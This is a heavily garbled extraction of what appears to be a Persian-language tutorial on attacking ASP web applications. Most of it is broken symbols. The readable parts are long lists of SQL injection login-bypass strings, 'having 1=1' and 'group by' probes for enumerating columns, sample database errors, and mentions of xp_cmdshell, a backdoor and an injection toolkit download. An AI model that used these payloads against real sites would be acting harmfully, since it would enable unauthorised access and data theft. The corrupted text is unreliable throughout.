
ASP Injection

asp learning


+

7 * ' 4 6
0

?# @ /

asp.net
#

asp.net
07 8 9 :
=

4 / 56

!
1

23 4

" #$ % &

) * >) *

)*

<* = ) 9 ( *

? 1

-- :

/ /

) *

0*

# :1 ;
-& <

web application
-.
'
()*
+, & "
!
/ ()*
2 5 6!
2
3
;%
<
%

'(

#$

< 1 -8
<!
ABC6

#
%0.
-

-,

1.
4%5
.

$ %
/
" 1 -=
! -.

0>
@ <xssBA
Xss

0%5
#

2 1

; E # ! ;
6 ()* $N #
N
:-

Cross site scripting


C3 :
? D 0%5
E # ;
2
1
script : G H
? F
!
9
Sql Injection BI
F Sql 8
J )
0K.
. E #
' ) < O
P !
' 5 L
M
N
!
-; H = 1
. -.
5 - . < - . -?
@ ? ?
) $ sql 4%5
Q <

http://planetsecurity.persiangig.com/My%20Sql%20Injection%20Full.rar
&0$

0$) 1

R, <- S

sql

7 8 >%

N #

!<- -?" asp


:
%? 8 >
N #
) N #
#
- . -? %
.
1
0/
! - ,
#
;
-?" %? <' )
F .7 0 ' T ; F
0 ' asp 4%5
$ %
.
login page G 6
0%5
7
N # S
!
.
$ % < Login page
#
7 password username
@ ?
?#
U , # C V T 1 -W !
/

%?
url G 6
5
! ; -? P
8
0 ' 1"
-,
/
., 8

8
1

Site.com/login.asp
Site.com/admin/login.asp
Site.com/admin.asp
And

" %P

%? Q

%?

#
%?

'
'User
'Pass
'PAss
';user
Pass;',
And

.
error

+, &

Q
: !

%?

%P
0%5 Q -

%?
+, & " %? J

-)

.
error %?
@ -

#
C
0>

ADODB.Field error '800a0bcd'


Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/day/page/2211/result.asp, line 61

%
! - 1

6 ?
8

Y - 3
%.9

5
#

+, & " %?
-) error # &/
%? !Z ? ?
-?" inject

5
@ -

or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
'or''='
'or'a'='a
admin'-admin' or 1=1 -' or 1=1
' or 0=0 -admin" or "a"=a
admin" or 1=1 -admin' or 'a'='a
admin') or ('a'='a
or 0=0 -' or 0=0 #
hi' or 1=1-hi" or 1=1-hi" or "a"="a
") or ("a"="a
') or ('a'='a
" or "a"="a
hi") or ("a"="a
hi') or ('a'='a
" or 0=0 #

8 1 ; %?
?

-, V -

: 8 > \5<
., 8

/ +, &
! . U,#C 1
#? 1
F-

[ '
# 1
: %?

" or 1=1-') or ('x'='x


or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin" or "a"="a
admin" or 1=1 -admin' or 1=1 -admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)-admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1-" or 1=1-or 1=1--

' or a=a-" or "a"="a


') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
DUMMYPASSWORD' OR 1=1 -' or 1=1-" or 1=1-or 1=1-' or 'a'='a
" or "a"="a

-, V # 1
%? - -) -' ) U , #
' or 1=1 T
#
?
DF
1
.
#
<
R,
^) 5
9 P
<
#
# %
.,
. admin 4T
-_
O
? % 9<
# <O 8
D ! .,
8 ` <
? ! 0%W 1 ;
-D
8F
#
! ) E
# 8 1
E !
-? 1
T
. ? 8 E
@ .
#

-;
%? %
., 8
%.9

C
\

<

R,
1 P 8 >
column #

#
D ! ?
0 ' ]N'
8 %?
?
%?
? D 0%W
?
table

' having 1=1--

@ ?

Mname_subject,doc

#%0

D #

<

%?

# 1

R,

-D

$ %

#%0 #

<

@<-

doc

D #

<

) #%0

mname_subject
!
9,: P
D 1

' group by Mname_subject,doc having 1=1--

[ '

<

#%0

D <

Mname_tittle,test

@ <

a,

R,

' group by Mname_subject,doc, Mname_tittle,test having 1=1--

!< O error O
@8

c*

-?

b- %

!
""!

%%&

b>

<

; e>;

'

1d

#$#$#$

) F-

., <

1 %P'

*+

fff

Q
#

D <
fff

D
@<

#%0
a,

R,

#$#$
.

fff < O g ,

<fff

N 1

# $#$
)

' 0.1* 0.1.2. *

-?

# $#$

' 0.1*

8%

.,

., 1

.,
/

[ W

:-

., H7

45 6 7 )

i
9;1 &9

@ . #%0
.00

admin inf3rnal
' 0.1*

#
3

45 6 7 -

h,
)

%W

45 6 7 )

fff

9'

%%

' 0.1*

., 1 %P'

@<' 0.1*

8 < .

fff 8
)

%%

D 1

. 1*< 1.2 *

. 1*< 1.2 * =

, .00 =

. 1*< 1.2 * =

, 0<;

,!

; '?9 =

/> -

,-

.,
/

h , &b

%
-

.00 !

0.1.2. * )
3

0.1.2. * )

fff

&9 *<1
3

.,

# @//@ -

8 1

0* *1*

h,

0.1.2. * )

fff R

0<;

& >

1.2 *
0<;

1.2 * =

0
0<;

2
0.1.2. * =

@
*
?
;

; * 02

/
!

B>>4> >6
)

C
73

C 1

union

DDE

@ F

* * 1 1;

$'

"

G<;? '

#
HI*<* '

where not in
fff

'*

<

W46 1

convert
,

F:

#%*

#""!

#""

@ -

*
?

; * 02
+

; * 02

a>

# %P

<.

*
?

B>>4> >6

A
!

B>>4> >6

9 )
-

33+

33+

33+

33+

*+

9 )

0 )

J,

$3 +
,

D3 +
JE ,

/3

1G1

33+

=& ,

33+

=& ,

$3 +
'1

J)

backdoor G 6

:
-

33+

=& ,

@ -

*1

'

?. 1*<33+

?. 1*<33+

KJ

- +
K

?. 1*<33+
KJ

?. 1*<33+

,, K

- +
K

?. 1*<33+
KJ

3 + K

?. 1*<33+

?. 1*<33+

3 +

?. 1*<33+

?. 1*<33+

: ]N'

VT

/DJ

+3+3+3+ D$ ,, K

/DJ

/DJ

' *<
3 +

KJ

/DJ

/DJ

3 +

$D/4L5 ,,

KJ
KJ

3 +

/DJ

J?3 + ,,

3 +
C

,, K
!

KJ
K

KJ

/DJ
KJ

KJ

%?

3 +

ftp G 6

- V

%26 : 1

3 +

/DJ

/DJ
/DJ?

3 +

3 +

J?3 +

-=

xp_cmdshell
@

?. 1*<33+

/
'

- +
E

J,

$3 + KD5

'
33+

H
?

=& ,

$3 +

)
$D/ E

KD5

/
$D/

., 8

@
$

N 1

@
$
%%E

E%%E

DF

%%E

E%%E

.,

$
)
E%%E$#D#/#4#L# E%
F

F$#D#/#4
E%%E$#D#/#4#L

#>#>#>#>#>#> 1

E%

@
$

D <

@
$

#%0

%? Q

D :

#%0 1

# -_%

@
$

#%0 1

!!! . 9 1 -_%

' #

"1 ,

\N

Q- 1
